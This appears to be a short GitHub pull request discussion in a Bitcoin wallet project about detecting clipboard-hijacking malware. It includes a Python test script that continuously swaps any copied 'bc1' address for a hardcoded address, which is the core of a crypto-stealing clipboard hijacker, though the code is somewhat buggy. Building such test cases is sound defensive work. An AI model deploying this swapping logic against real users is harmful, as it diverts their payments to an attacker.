[WIP] Checks for clipboard malware

[lontivero]

This PR is just for sharing an idea we could use in the future in order to prevent the threat of clipboard hijacking attack. The idea is simply copy an address to the clipboard and check whether the pasted clipboard content is equal to the copied address or not.

In case of detecting the original address has been replaced we alert to the user or take some other action.

You can test the this with the following python sctipt (you need to have xclip installed).

import subprocess

destination_address = 'bc1qm0f0xz5kfsqxegngp98zlru80x35xmj537mn9v'.encode()

def get_clipboard():
    p = subprocess.Popen(['xclip','-selection', 'clipboard', '-o'], stdout=subprocess.PIPE)
    retcode = p.wait()
    data = p.stdout.read().encode()
    if data[:3] == "bc1":
        swap_address()
        
def swap_address():
    p = subprocess.Popen(['xclip','-selection','clipboard'], stdin=subprocess.PIPE)
    p.stdin.write(destination_address)
    p.stdin.close()
    retcode = p.wait()

while True:
    get_clipboard()    

[nopara73]

First I thought, it'd be quite annoying for the user, because we're copying addresses all the time. However false positive alerts may end up giving a good impression about the wallet, so concept ACK.

[nopara73]

Could you properly implement it later after everything is done regarding OSX? (I may even take a stab at it myself if I'm fed up by the important work and looking for some fun work.)

[lontivero]

I've been thinking about this for a while and it really makes no sense at all.

[nopara73]

I think this does, we just need to figure this out in a more comprehensive way, probably even writing a BIP would be needed, too.

[nopara73]

Closing this, it's too old.